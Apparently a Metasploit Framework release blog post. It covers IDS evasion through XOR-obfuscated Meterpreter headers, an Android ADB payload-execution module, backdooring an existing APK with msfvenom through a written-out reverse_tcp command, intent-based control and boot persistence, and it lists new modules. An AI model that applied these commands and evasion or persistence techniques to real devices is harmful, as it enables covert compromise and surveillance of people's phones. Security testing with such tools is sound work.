A little entropy goes a long way
Meterpreter can communicate via straight TCP or over HTTP(S), but whatever the transport, the protocol is pretty much the same. It uses what is called a TLV protocol, for Type-Length-Value. In truth, meterpreter actually does it in a different order: Length, Type, Value. Each meterpreter packet is a collection of TLVs and is itself a TLV. That makes it so you can skip over a type or even a whole packet without having to know how to parse it, but that doesn't really matter. What's important for us when talking about what this looks like on the wire is that each packet's method is a recognizable string in the header. That in turn makes it easier for IDS/IPS to get angry with our packets. And we don't like making them angry. As of this week, that recognizable string is no longer recognizable. Instead, it's xor'd with a random value so no two packet headers are alike (probablistically).
More Android fun
Debugging like a boss
ADB is a debugging tool for android that you can enable by turning on the phone's developer mode. It can run as a TCP server, much like GDB server does, and convincing a debugger to run code for you is pretty straight forward, since that's kinda what it's for. Typically, remote debuggers aren't exposed to real networks, but you never know. Where this is more likely to show up is on a developer's machine, where the adb service is used to communicate with a local emulator or a device connected via USB. Now with exploit/android/adb/adb_server_exec, you can upload a native payload to those devices for fun and profit.
Backdoor all the things
For a longer term solution, you might want to take advantage of the new ability in msfvenom to use an existing APK as a template. First, you'll need a couple of external tools -- jarsigner from any ol' java sdk and apktool. Once those are squared away, you can take something like Facebook's APK and inject a Meterpreter payload on top of it:
msfvenom -x foo.apk -p android/meterpreter/reverse_tcp LHOST=220.127.116.11 -o bar.apk
Bad intentions, or Badass intentions?
Intents are neat. They're basically a way to tell an android device, "run whatever app is registered to handle this thing." One of the most common is android.intent.action.VIEW, which handles images and web pages and such. There's now a new command called
activity_start that lets you manually invoke arbitrary intents. So once you've got that Meterpreter session, you can do this
and have everyone's favorite song play on youtube. There's another one called BOOT_COMPLETED that lets you register a thing to run when the phone is finished booting; basically built-in persistence. We've had this one enabled for a while now, but we haven't mentioned it here yet: as long as you install the APK and run it once, the device will kindly restart it everytime it comes back on.
Exploit modules (2 new)
- Android ADB Debug Server Remote Payload Execution by joev
- D-Link DCS-930L Authenticated Remote Command Execution by Nicholas Starke
Auxiliary and post modules (4 new)
- Server Opcode 0x534 Denial of Service by Gianni Gnesa, and William Webb exploits OSVDB-132307
- Jenkins-CI Unauthenticated Script-Console Scanner by Jeffrey Cap, and altonjx
- Wordpress XML-RPC system.multicall Credential Collector by sinn3r, KingSabri, and William
- Telisca IPS Lock Cisco IP Phone Control by Fakhir Karim Reda, and zirsalem
As always, you can update to the latest Metasploit Framework with a simple msfupdate and the full diff is available on GitHub: 4.11.7...4.11.10